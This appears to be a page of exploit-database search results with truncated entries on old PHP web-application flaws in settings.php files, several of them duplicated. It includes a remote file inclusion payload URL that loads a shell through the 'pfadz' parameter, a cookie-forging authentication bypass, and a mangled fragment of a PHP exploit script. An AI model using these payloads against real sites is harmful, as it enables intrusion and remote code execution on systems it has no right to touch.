190 matches found
MyCMS 0.9.8 - Remote Command Execution (1)
MyCMS 0.9.8 - Remote Command Execution 1 !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;...
Authentication flaw
Pheap 2.0 allows remote attackers to bypass authentication by setting a pheap_login cookie value to the administrator's username, which can be used to (1) obtain sensitive information, including the administrator password, via settings.php or (2) upload and execute arbitrary PHP code via an update_doc...
CVE-2007-2985
Pheap 2.0 allows remote attackers to bypass authentication by setting a pheap_login cookie value to the administrator's username, which can be used to (1) obtain sensitive information, including the administrator password, via settings.php or (2) upload and execute arbitrary PHP code via an update_doc...
CVE-2007-2985
CVE-2007-2985 affects Pheap 2.0. An attacker can bypass authentication by setting the pheap_login cookie to the administrator’s username, enabling (1) access to sensitive info, including the admin password via settings.php and (2) upload/execute arbitrary PHP code via the update_doc action in edi...
Input validation
PHPChain 1.0 and earlier allows remote attackers to obtain the installation path via invalid values of the catid parameter to (1) settings.php or (2) cat.php, as demonstrated by XSS manipulations...
MyBlog 0.9.8 - 'Settings.php' Authentication Bypass
source: https://www.securityfocus.com/bid/23521/info MyBlog is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and then access or overwrite files with arbitrary PHP script code. Script code added to certain files are later...
CVE-2007-1635
Static code injection vulnerability in admin/settings.php in Net Portal Dynamic System (NPDS) 5.10 and earlier allows remote authenticated users to inject arbitrary PHP code via the xtop parameter in a "ConfigSave" op to admin.php, which can later be accessed via a "Configure" op to admin.php...
SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability
To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th AsB-MaY DiScOvEr ExPlIoTs Gr0uP Settings.php:- include_once($pfadz."scripts/session.php");...
smadb-rfi.txt
To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th Settings.php:- include_once($pfadz."scripts/session.php"); ExPlOiT:-http://www.Site.com/theme/settings.php?pfadz=Shell...
SMA-DB 0.3.9 - 'settings.php' Remote File Inclusion
To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th Settings.php:- include_once($pfadz."scripts/session.php"); ExPlOiT:-http://www.Site.com/theme/settings.php?pfadz=Shell milw0rm.com 2007-02-05...
SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability
No description provided by source. To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th AsB-MaY DiScOvEr ExPlIoTs Gr0uP Settings.php:- include_once($pfadz."scripts/session.php");...
SMA-DB 0.3.9 - settings.php Remote File Inclusion
SMA-DB 0.3.9 - settings.php Remote File Inclusion To ConTacT mE:wWw.Asb-May.net/bb ScRiPt:-http://people.ee.ethz.ch/dmaeder/bluevirus/downloader.php?filename=U01BLURC&referrer=hots Discovered By:- ThE dE@Th Settings.php:- include_once($pfadz."scripts/session.php");...
IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability
IncCMS Core 1.0.0 - settings.php Remote File Inclusion
IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications
IncCMS Core <= 1.0.0 (settings.php) Remote File Include Vulnerability
No description provided by source.
IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion
CVE-2006-4621
PHP remote file inclusion vulnerability in settings.php in Pheap 1.2, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the lpref parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. The...
Design/Logic Flaw
PlaNet Concept plaNetStat 20050127 allows remote attackers to gain administrative privileges, and view and configure log files, via a direct request to the (1) admin.php or (2) settings.php page...
CVE-2006-0940
Multiple direct static code injection vulnerabilities in savesettings.php in ShoutLIVE 1.1.0 allow remote attackers to execute arbitrary PHP code via variables that are written to settings.php...